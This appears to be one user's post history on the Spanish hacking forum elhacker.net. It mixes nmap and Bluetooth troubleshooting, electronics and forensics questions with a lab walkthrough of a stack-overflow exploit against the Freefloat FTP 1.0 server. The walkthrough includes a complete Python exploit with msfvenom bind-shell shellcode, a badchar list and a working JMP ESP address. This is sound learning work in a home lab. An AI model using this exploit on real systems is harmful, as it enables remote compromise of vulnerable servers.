elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11
71  Seguridad Informática / Seguridad / Re: Comandos nmap desde lo mas básico [ Parte 1º ] en: 23 Diciembre 2016, 08:34 am
No sería "Para escanear todos los host de una subred?". Por ahí estoy equivocado.

Entiendo que el /24 es por la máscara (255.255.255.0) por lo tanto según supongo debería escanear todos los host de esa red.

Exacto, es como decís vos, es para escanear todos los hosts de la subred con máscara 255.255.255.0, es decir, desde 255.255.255.1 hasta 255.255.255.254.

Si se tratase de una red con máscara 255.255.0.0 por ejemplo, se utilizaría /16 para escanear desde 255.255.0.1 hasta 255.255.255.254, el número despues de la barra representa los bits usados para red/subred.

Saludos!
72  Comunicaciones / Hacking Mobile / [Bluetooth] Problemas en 2016 llevando a la práctica material de hace 10 años en: 7 Diciembre 2016, 09:38 am
Muy buenas a todos! Estaba leyendo el manual de seguridad en bluetooth de 170 páginas (del 2005) que encontré aquí en elhacker.net, llegué más o menos a la página 110, la verdad está excelente y aprendi un montón, pero siempre me pasa lo mismo, que cuando quiero volcar la teoría en la práctica me encuentro con 985329589234523485923485 problemas inesperados. Antes de empezar a leer, probé intercambiar archivos entre un LG viejo (con tapita, no tactil, no wifi, no smartphone), y mi Alcatel One Touch Pop S3, y pude comunicarlos excitosamente por bluetooth. Ahora desde Kali pude emparejar a los dispositivos (Notebook con Kali 2.0 y el Alcatel One Touch Pop S3), pero cuando quiero hacer una transferencia de archivos por ejemplo, tanto del celular a la pc como de la pc al celular, no estoy pudiendo. Desde el celular a la pc me salta un cartel que dice conexion erronea, o algo parecido. Desde la pc al celular probé a través de la interfaz gráfica y no pude, probé a través del obexftp y obtengo el siguiente resultado:

Código:
root@skali:~# obexftp -v -b B0:E0:3C:XX:XX:XX -B 20 -p /root/imagen.png
Connecting..\done
Sending "/root/imagen.png"...|failed: /root/imagen.png
The operation failed with return code 80
Disconnecting../done

Busqué en google: "The operation failed with return code 80" y no encontré ni un solo resultado... Sin las comillas encuentro problemas con distintos códigos de errores, pero ninguno con 80. También probé usar Wifislax en lugar de Kali y me pasó exactamente lo mismo. No pude probar con otro celular porque no tengo a mi alcance. De todos modos la primera vez hace mucho que probé transferir archivos desde el LG a mi Alcatel, lo pude hacer, asi que por eso me imagino q el problema tiene más que ver con la PC que con el celular.

Tuve dos problemas más, pero que tengo una idea de lo que puede llegar a ser, y me gustaría que me indicaran si estoy acertado o me estoy equivocando, porque quedarme con la duda es algo que me hace muuuuuy mal jajaja.

El segundo problema con el que me encontré, fue en BlueLine, al agregar los caracteres especiales de salto de linea, el celular me los representa como espacios, y no puedo llegar a alterar todo el mensaje como se veía en el pdf que les cuento... Supongo que ésto servía para ciertas versiones viejas de móviles. Corrijanme si me equivoco...

El tercer problema fue cuando quise ejecutar comandos AT sobre una sesion rfcomm:

Código:
root@skali:~# rfcomm connect 0 B0:E0:3C:XX:XX:XX 2
Connected /dev/rfcomm0 to B0:E0:3C:XX:XX:XX on channel 2
Press CTRL-C for hangup

root@skali:~# cu -l rfcomm0 -s 9600
cu: open (/dev/rfcomm0): Permission denied
cu: rfcomm0: Line in use

Éste problema ya lo tuvieron y lo contestaron en éste mismo foro aquí en éste enlace:
https://foro.elhacker.net/hacking_mobile/problemas_con_bluetooth-t93112.0.html

En mi caso, el problema supongo que tiene que ver con:

Citar
También debes estar seguro de q el canal al q te quieres conectar con rfcomm es el asociado al perfil q buscas: puerto serie o dial up network...

Estoy usando una comunicacion en el canal 2 que no es ni de puerto serie ni de dial up network, ya que esos servicios no estaban disponibles en mi movil. Aqui les muestro los que si:

Código:
Service RecHandle: 0x10000
Service Class ID List:
  "Generic Attribute" (0x1801)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 31
  "ATT" (0x0007)
    uint16: 0x0001
    uint16: 0x0005

Service RecHandle: 0x10001
Service Class ID List:
  "Generic Access" (0x1800)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 31
  "ATT" (0x0007)
    uint16: 0x0014
    uint16: 0x001e

Service Name: Headset Gateway
Service RecHandle: 0x10002
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0102

Service Name: Handsfree Gateway
Service RecHandle: 0x10003
Service Class ID List:
  "Handsfree Audio Gateway" (0x111f)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 3
Profile Descriptor List:
  "Handsfree" (0x111e)
    Version: 0x0106

Service Name: AV Remote Control Target
Service RecHandle: 0x10004
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x0102
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0103

Service Name: Advanced Audio
Service RecHandle: 0x10005
Service Class ID List:
  "Audio Source" (0x110a)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 25
  "AVDTP" (0x0019)
    uint16: 0x0102
Profile Descriptor List:
  "Advanced Audio" (0x110d)
    Version: 0x0102

Service Name: Android Network Access Point
Service Description: NAP
Service RecHandle: 0x10006
Service Class ID List:
  "Network Access Point" (0x1116)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 15
  "BNEP" (0x000f)
    Version: 0x0100
    SEQ8: 0 6
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "Network Access Point" (0x1116)
    Version: 0x0100

Service Name: OBEX Phonebook Access Server
Service RecHandle: 0x10008
Service Class ID List:
  "Phonebook Access - PSE" (0x112f)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 19
  "OBEX" (0x0008)
Profile Descriptor List:
  "Phonebook Access" (0x1130)
    Version: 0x0101

Service Name: OBEX Object Push
Service RecHandle: 0x10009
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 12
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: SMS/MMS Message Access
Service RecHandle: 0x1000a
Service Class ID List:
  "Message Access - MAS" (0x1132)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 16
  "OBEX" (0x0008)
Profile Descriptor List:
  "Message Access" (0x1134)
    Version: 0x0100

Service Name: Email Message Access
Service RecHandle: 0x1000b
Service Class ID List:
  "Message Access - MAS" (0x1132)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 17
  "OBEX" (0x0008)
Profile Descriptor List:
  "Message Access" (0x1134)
    Version: 0x0100

Service Name: SIM Access Server
Service RecHandle: 0x1000d
Service Class ID List:
  "SIM Access" (0x112d)
  "Generic Telephony" (0x1204)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 15
Profile Descriptor List:
  "SIM Access" (0x112d)
    Version: 0x0101

Service Name: OBEX File Transfer
Service RecHandle: 0x1000e
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 20
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX File Transfer" (0x1106)
    Version: 0x0101

Probé con sesiones rfcomm en varios canales pero siempre con el mismo error, supongo que ya mi dispositivo de por si al no tener servicio de puerto serie ni dial up, no tengo ninguna otra forma para utilizar una sesion rfcomm para ejecutar comandos AT. Corrijanme si me equivoco...

Otro dato es que el archivo de configuración /etc/buetooth/hci.conf que menciona el pdf, yo no lo tengo, pero tengo otros cuatro: input.conf  main.conf  network.conf  proximity.conf

Bueno! Espero que me ayuden a resolver el primer problema que es el que más me preocupa! Y en cuanto los otros dos problemas solo quiero saber si estoy acertado en mi pensamiento o estoy equivocado. Saludos y gracias desde ya!
73  Foros Generales / Foro Libre / El guason está relacionado con el mundo del hacking? en: 14 Noviembre 2016, 05:43 am
Buenas! No miré mucho de batman, recuerdo haber visto batman inicia hace varios años pero no recuerdo casi nada de la película en sí. He visto que la imagen del guason es muy utilizada por integrantes de ésta comunidad, y me mató la curiosidad el hecho de saber si tiene alguna ralación con el mundo del hacking, o de la informática en general, alguna relación en ideologías o si tiene más que ver con el actor. Saludos!
74  Seguridad Informática / Bugs y Exploits / Re: Sobreescribo EIP pero no logro que se ejecute mi shellcode en: 6 Noviembre 2016, 22:54 pm
Muchisimas gracias a ambos por su tiempo! Lamentablemente sigo sin conseguir resultados, pero hice otras pruebas y se que estoy cerca de resolverlo!

En primer lugar, estuve investigando un poco sobre DEP en Windows y descubrí que tengo el parámetro noexecute=optin en el archivo bootini, lo que significa que DEP se aplica solo a componentes del SO, y se puede activar para distintos ejecutables pero manualmente. De todas formas me asegure de desactivarlo por completo con noexecute=alwasoff, y probé volver a ejecutar el exploit, y sigo sin resultados, con lo que descartamos que el problema sea por DEP.

Después probé agregar un breakpoint justo donde se hace el JMP ESP, pero el servicio crashea y vuelve exactamente al mismo resultado de la segunda imagen que publiqué anteriormente. No entiendo como es que no se me detiene la ejecución antes de realizar el JMP ESP.

Por otro lado encontre éste link que explica como explotar el mismo servidor sobre Win XP. Een éste caso utiliza Win XP SP3 ENG y el que yo estoy usando es Win XP SP2 SPA, pero lo único que cambia supongo que es la dirección del JMP ESP. Revisando me enteré que hay una lista de badchars a evitar en el shellcode. Yo hasta ahora solo incluía el \x00, pero según la página, la lista de badchars en este caso es la siguiente:

\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d

Asi que volví a ejecutar el msfvenom agregando dicha lista,  y ejecuto el exploit, y vuelvo a exactamente lo mismo... Verifique que la shellcode en memoria sea la misma que la que me genero msfvenom, y lo es... Y un dato curioso que tal vez sea la clave para entender mi problema, es el siguiente:

Justo después de la shellcode, en la pila el dato que le sigue es la dirección de memoria 0x000A0D2E , que es exactamente a donde me apunta EIP luego de ejecutar el exploit... Aquí les remarqué en rojo donde está la dirección que les digo:


https://s22.postimg.org/8uc7ommjl/test.png

(en éste caso use BBBB para sobreescribir EIP). Fíjense, 71,7b son los últimos bytes de la shellcode, y luego le sigue la dirección que les comentaba.

 Seguí insistiendo, cambie la shellcode por una serie de caracteres C, con una longitud mucha menor que la shellcode anterior, y en la memoria se ve 4343434343, y justo cuando termina la secuencia, aparece exactamente la misma dirección...

Con ésta información que les estoy dando, tienen algún otra idea de cuál puede ser mi problema? Muchas gracias desde ya!

Ahi lo logré señores! :D

Bajé el pyCommand mona.py y busque todos los JMP ESP que había, y en vez de sobreescribir EIP con el JMP ESP de la librería USER32.dll, utilicé un JMP ESP de la librería SHELL32.dll. La verdad no comprendo por qué con una dirección me funciona y con otra no...

Aquí ven los datos de la dirección que usaba antes y no me funcionaba:

Log data, item 12
 Address=77D5AF0A
 Message=  0x77d5af0a : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600
.2180 (C:\WINDOWS\system32\USER32.dll)

Y aquí los datos de la direccion que uso ahora y funciona:

Log data, item 23
 Address=7CA68265
 Message=  0x7ca68265 : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.29
00.2180 (C:\WINDOWS\system32\SHELL32.dll)

Saludos y gracias! :D

MOD: No hacer doble post.
75  Seguridad Informática / Bugs y Exploits / Sobreescribo EIP pero no logro que se ejecute mi shellcode en: 5 Noviembre 2016, 21:13 pm
Muy buenas! Les comento mi inconveniente. Estaba tratando de explotar el servidor FTP Freefloat 1.0, el cuál tiene un fallo de stack overflow. Estoy usando VM con Windows Profesional SP2 Version 2002, ESP (ip 192.168.0.107), y otra VM con Kali 2.0 (ip 192.168.0.106). Probando con el fuzzer de ftp de metasploit, logré crasharlo mandando una cadena muy larga junto con el comando USER. Luego con el pattern_create.rb y pattern_offset.rb determiné que hay 230 bytes hasta sobreescribir EIP. Escribí un exploit y logré escribir 42424242 en EIP. Como pueden ver en la siguiente imagen:



Luego, creé varias shellcodes con msfvenom. Primero probé meterpreter/reverse_tcp, ahora estoy probando con shell/bind_tcp, pero no estoy consiguiendo la shell...  Después de ejecutar el exploit, el Immunity muestra lo siguiente:



Estoy utilizando la técnica de sobreescribir EIP por la dirección de USER.dll que apunta a JMP ESP. Y me parece que hasta aquí funciona, es decir, EIP logra llegar al stack, como ven en la imagen anterior... Por si las moscas, aca les muestro la dirección de JMP ESP:



Y mi código final del exploit:

Código
  1. #!/usr/bin/python
  2. import socket
  3.  
  4. target = "192.168.0.107"
  5. junk = "\x41" * 230
  6. eip = "\x0a\xaf\xd5\x77"
  7. nops = "\x90" * 30
  8. #msfvenom -a \x86 --platform windows -p "windows/shell/bind_tcp" LHOST=192.168.0.107 LPORT=4444 -b '\x00' -f python
  9. #Payload size: 326 bytes
  10. #Final size of python file: 1574 bytes
  11. payload =  ""
  12. payload += "\xdb\xd5\xba\xf1\x47\xde\x08\xd9\x74\x24\xf4\x58\x2b"
  13. payload += "\xc9\xb1\x4b\x31\x50\x1a\x83\xc0\x04\x03\x50\x16\xe2"
  14. payload += "\x04\xbb\x36\x8a\xe6\x44\xc7\xeb\x6f\xa1\xf6\x2b\x0b"
  15. payload += "\xa1\xa9\x9b\x58\xe7\x45\x57\x0c\x1c\xdd\x15\x98\x13"
  16. payload += "\x56\x93\xfe\x1a\x67\x88\xc2\x3d\xeb\xd3\x16\x9e\xd2"
  17. payload += "\x1b\x6b\xdf\x13\x41\x81\x8d\xcc\x0d\x37\x22\x78\x5b"
  18. payload += "\x8b\xc9\x32\x4d\x8b\x2e\x82\x6c\xba\xe0\x98\x36\x1c"
  19. payload += "\x02\x4c\x43\x15\x1c\x91\x6e\xec\x97\x61\x04\xef\x71"
  20. payload += "\xb8\xe5\x43\xbc\x74\x14\x9a\xf8\xb3\xc7\xe9\xf0\xc7"
  21. payload += "\x7a\xe9\xc6\xba\xa0\x7c\xdd\x1d\x22\x26\x39\x9f\xe7"
  22. payload += "\xb0\xca\x93\x4c\xb7\x95\xb7\x53\x14\xae\xcc\xd8\x9b"
  23. payload += "\x61\x45\x9a\xbf\xa5\x0d\x78\xde\xfc\xeb\x2f\xdf\x1f"
  24. payload += "\x54\x8f\x45\x6b\x79\xc4\xf4\x36\x16\x29\x34\xc9\xe6"
  25. payload += "\x25\x4f\xba\xd4\xea\xfb\x54\x55\x62\x25\xa2\x9a\x59"
  26. payload += "\x91\x3c\x65\x62\xe1\x15\xa2\x36\xb1\x0d\x03\x37\x5a"
  27. payload += "\xce\xac\xe2\xf6\xc5\x0b\x5d\xe4\x27\xc1\x5c\x82\xd5"
  28. payload += "\x7e\xb5\x5d\x05\x9e\xb6\xb4\x2e\x37\x4b\x36\x40\x94"
  29. payload += "\xc2\xd0\x08\x34\x83\x4b\xa5\xf6\xf0\x44\x52\x08\xd3"
  30. payload += "\x2f\x5c\x83\x84\x78\x35\xdb\xdc\xbe\x3a\xdc\xca\xe9"
  31. payload += "\xac\x57\x19\x2e\xcc\x67\x34\x07\x99\xf0\xc2\xc9\xe8"
  32. payload += "\x61\xd2\xc0\x99\x61\x46\xee\x0b\x35\xfe\xec\x6a\x71"
  33. payload += "\xa1\x0f\x59\x01\xa6\xef\x1c\x2b\xdc\xd9\x8a\x73\x8a"
  34. payload += "\x25\x5b\x74\x4a\x73\x31\x74\x22\x23\x61\x27\x57\x2c"
  35. payload += "\xbc\x5b\xc4\xb8\x3f\x0a\xb8\x6b\x28\xb0\xe7\x5b\xf7"
  36. payload += "\x4b\xc2\xd8\xf0\xb4\x93\xd9\x01\x76\x42\x23\x74\x91"
  37. payload += "\x56"
  38.  
  39.  
  40. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  41. s.connect((target,21))
  42. print "\n\n[-] Sending exploit ..."
  43. print s.recv(2000)
  44. s.send("USER "+junk+eip+nops+payload+"\r\n")
  45. s.close()
  46.  

Probé también cambiando la cantidad de NOPS. Nunca termine de entender muy bien para que sirven esos NOPS que están después de la dirección de retorno... Supongo que para hacer espacio hasta llegar a ESP, pero no entiendo bien que cantidad usar... Si me pueden aclarar ésta duda les agradecería...

Más allá de esa dudita, no creo que sea problema de NOPS, se me ocurre que hay algúna medida de mitigación que está activada y no me doy cuenta. Si necesitan algo más para ayudarme con ésto para que pueda comprender bien como explotar correctamente el bug, estaría agradecidicimo!!! Saludos y gracias desde ya.

MOD: Imagenes adaptadas a lo permitido.
76  Informática / Electrónica / Re: Se levantó la pintura conductora del power del control remoto en: 18 Octubre 2016, 00:31 am
Es asi la calidad de la cámara del celu, si tuviera plata no estaría preguntando ésto, tal vez hubiera ido directo a comprar un remoto nuevo. Salu2
77  Informática / Electrónica / Se levantó la pintura conductora del power del control remoto en: 12 Octubre 2016, 15:08 pm
Muy buenas a todos, quería comentarles de un problema que tengo con mi remoto. Estan funcionando todos los botones menos el power.

Aca una imágen del mismo:



Como ven se levantó la pintura conductora del power (fijense arriba a la izquierda). Mi viejo había probado pasarle alcohol isopropílico pero en el intento se estaban por dañar las pistas.

Quería saber si hay alguna forma para resolver éste problema. Aclaro que no poseo muchos conocimientos en electrónica, asi que si me equivoco en algo me corrigen, y espero que me sepan ayudar.

Saludos y gracias!

MOD: Imagen adaptada a lo dictado por las reglas del foro (800x600 máx.)
78  Foros Generales / Dudas Generales / Re: Forensia - Como pueden estar seguros de quien fue el atacante? en: 1 Septiembre 2016, 03:25 am
Claro, bueno me imaginaba que se necesitaba una orden judicial, lo que escribí fue a grandes rasgos, y si, jaja de la forma que lo escribí quedó como la película de Kevin Mitnick, cuando está en el auto haciendo el ataque de ing. social :p, pero en fin, te agradezco mucho x el enlace que me mandaste, que me aclaró todo lo que tenía en duda!

Saludos y éxitos!
79  Foros Generales / Dudas Generales / Forensia - Como pueden estar seguros de quien fue el atacante? en: 31 Agosto 2016, 23:14 pm
Que tal? Hoy pensando un poco sobre ésto, se me planteo la duda de cómo a través de una IP se puede llegar a determinar que persona fue la responsable de un determinado ataque, ya sea algún escaneo de puertos, o alguna inyección SQL que quede almacenada en un log... Se que la víctima puede pedir al ISP el nombre del asociado de determinada IP a tal hora, pero mi pregunta es... Como pueden determinar que el que realizó el ataque es el mismo asociado de la IP y no otro hacker que utilizó la PC del asociado de la IP???

Para que se entienda mi duda....
Yo soy Marcos, y el señor Josesito a través de un troyano logró entrar a través de internet a mi PC...

Josesito a través de mi PC tiene la idea de hacer una inyección SQL a determinada web... El admin revisa el log de Apache y se encuentra con mi IP y con la cadena maliciosa, entonces llama a mi ISP y el ISP le deja mi nombre...

Entonces yo tendría que pagar el precio de la actividad ilicita? O a través de alguna técnica se puede ubicar a Josesito?

Saludos y gracias por aclarar mis dudas
80  Seguridad Informática / Criptografía / Re: Tiempos de crackeo para las diferentes técnicas en: 3 Agosto 2016, 04:13 am
Muchas gracias engel! Ahí me puse a leer sobre colisiones en hashes y me pareció muy interesante!

Impresionante el hecho de que ingresando una cadena distinta al password pueda llegar a obtener un mismo hash y pueda conseguir un login satisfactorio!!!!
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines